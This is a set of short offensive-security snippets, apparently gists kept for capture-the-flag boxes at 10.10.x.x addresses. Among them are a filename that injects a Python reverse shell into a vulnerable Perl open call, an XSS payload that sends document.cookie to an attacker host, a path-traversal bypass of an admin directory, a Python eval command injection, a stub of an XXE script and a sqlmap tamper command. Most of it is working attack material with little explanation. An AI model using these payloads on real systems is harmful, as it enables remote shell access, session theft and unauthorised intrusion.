shollingsworth

#!/usr/bin/env bash
set -euo pipefail
IFS=$'\n\t'

path="user.php"
path="/etc/vsftpd/vsftpd.conf"
path="/var/log/vsftpd.log"

R=hostname.com
MYHOST=127.0.0.1

shollingsworth

#!/usr/bin/env bash
set -euo pipefail
IFS=$'\n\t'

fn="evil.csv"
curl \
    --user "pwnuser:sekret" \
    --insecure "ftp://${R}/dir/${fn}" \
    -T "${fn}"

shollingsworth

#!/usr/bin/python3
# -*- coding: utf-8 -*-
import os
import datetime
import json
from collections import deque
from dataclasses import dataclass
from pathlib import Path
from typing import Optional
import subprocess

shollingsworth

# https://wiki.sei.cmu.edu/confluence/pages/viewpage.action?pageId=88890543
touch "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"10.10.XX.XX\",9001));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")';echo .csv"

#  vulnerable open command
# my $fname = "${csv_dir}/${type}.csv";
# open(my $fh, ">>", $fname) or die "Unable to open CSV target file.\n";

shollingsworth

# blocked
http://10.10.10.249/admin/
# bypassed
http://10.10.10.249/admin../admin_staging/index.php?page=user.php

# dirsearch example
dirsearch -u http://10.10.10.249/admin..

shollingsworth

ps auxfww

shollingsworth

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""XXE attack."""
from base64 import b64decode, b64encode
from urllib import parse

import bs4
import requests

# For post requests

shollingsworth

<script>new Image().src="http://10.10.14.4/bogus.php?output="+document.cookie;</script>

shollingsworth

# example with number prefix
4+__import__('os').system('id')

shollingsworth

sqlmap -r ./request2 --eval="category=''.join([hex(ord(i)).replace('0x', r'\\u00') for i in category])" --batch --skip-urlencode